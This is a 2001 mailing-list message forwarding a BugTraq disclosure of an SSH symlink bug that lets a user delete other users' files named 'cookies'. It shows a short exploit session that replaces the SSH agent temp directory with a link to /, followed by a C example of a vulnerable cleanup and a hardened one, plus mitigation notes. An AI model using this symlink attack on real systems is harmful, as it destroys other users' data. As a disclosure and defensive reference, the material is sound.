Date: Wed, 6 Jun 2001 12:47:02 +0300
From: Valentin Nechayev <netch@lucky.net>
To: security@freebsd.org
Subject: [fwd] SSH allows deletion of other users files...
Message-ID: <20010606124702.A30808@lucky.net>

Is it applicable to FreeBSD?
(BugTraq contains a report that it is)

/netch

Forwarded message:

Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
From: <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Subject: SSH allows deletion of other users files...
Message-ID: <Pine.LNX.4.33.0106042203210.13293-100000@clarity.local>

SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want... as long as it's
called cookies. Not really a very useful bug, but could cause annoyances
to people who actually like their cookies.

/home/zen/.netscape/cookies

sample exploit:-

[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

--zen-parse
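
In the session above, the cleanup at logout followed /tmp/ssh-XXW9hNY9 after it had been replaced with a symlink. The C code below is an added example, not code from the original message or from any SSH implementation: it contrasts a path-based unlink with a cleanup that opens the directory with O_NOFOLLOW, checks its owner, and removes the file with unlinkat. The function names and the sandbox under /tmp are assumptions made for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Path-based cleanup: a symlink swapped in for the directory is followed. */
int naive_cleanup(const char *dir) {
    char path[4096];
    snprintf(path, sizeof path, "%s/cookies", dir);
    return unlink(path);
}

/* Hardened cleanup: pin the directory itself, verify it, unlink relative to it. */
int safe_cleanup(const char *dir, uid_t owner) {
    struct stat st;
    int fd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW); /* refuses a symlink */
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    int rc = unlinkat(fd, "cookies", 0); /* resolved inside the pinned directory */
    close(fd);
    return rc;
}

/* Constructed sandbox: "victim" stands in for /, "sess" for the session directory. */
int demo(int hardened) {
    char base[] = "/tmp/cleanup-demo-XXXXXX", victim[64], sess[64], file[96];
    if (!mkdtemp(base)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(sess, sizeof sess, "%s/sess", base);
    snprintf(file, sizeof file, "%s/cookies", victim);
    if (mkdir(victim, 0700) != 0) return -1;
    int fd = open(file, O_CREAT | O_WRONLY, 0600);
    if (fd < 0 || close(fd) != 0 || symlink(victim, sess) != 0) return -1;
    if (hardened) safe_cleanup(sess, geteuid()); else naive_cleanup(sess);
    int survived = access(file, F_OK) == 0;
    unlink(file); unlink(sess); rmdir(victim); rmdir(base);
    return survived; /* 1 = the victim's file is still present */
}

int main(void) {
    printf("naive: survived=%d, hardened: survived=%d\n", demo(0), demo(1));
    return 0;
}
```

O_NOFOLLOW only guards the final path component, so the parent directory must not be replaceable by the user. Performing the cleanup with the session user's privileges instead of root's limits the damage independently of the path checks.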